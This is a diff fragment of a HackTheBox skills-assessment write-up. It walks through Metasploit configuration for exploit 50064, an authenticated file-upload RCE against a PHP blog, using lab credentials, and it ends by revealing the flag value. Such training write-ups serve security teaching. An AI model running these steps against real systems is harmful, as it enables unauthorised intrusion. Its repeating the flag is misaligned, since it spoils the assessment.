Collinformatics/HackTheBox/SkillsAssessment/Shells & Payloads/writeup.md

         Password: admin123!@#

-Once we've logged in, theres a form to POST data thats waiting for us to exploit it.
+Once we've logged in, there's a form to POST data thats waiting for us to exploit it.

+- Also, if we look at Slade Wilson's last post, he seems to have found a vulenerabiliy in the blog, 50064.

+  - This is a Remote Code Execution (RCE) exploit that targets authenticated file upload vulnerabilities found in PHP blogs.

+Well find it on our system with:

+      locate 50064
+      ...
+      /usr/share/metasploit-framework/modules/exploits/50064.rb

+Next, well copy it:

+      cp /usr/share/metasploit-framework/modules/exploits/50064.rb 50064.rb

+Let's start metasploit, and use the script we just copied:

+      use 50064.rb

+- Now we can configure the script:

+      set RHOSTS 172.16.1.12
+      set USERNAME admin
+      set PASSWORD admin123!@#
+      set VHOST blog.inlanefreight.local

+And if we run it, we can get our shell, from there the flag is easy to find:

+      cat /customscripts/flag.txt
+      B1nD_Shells_r_cool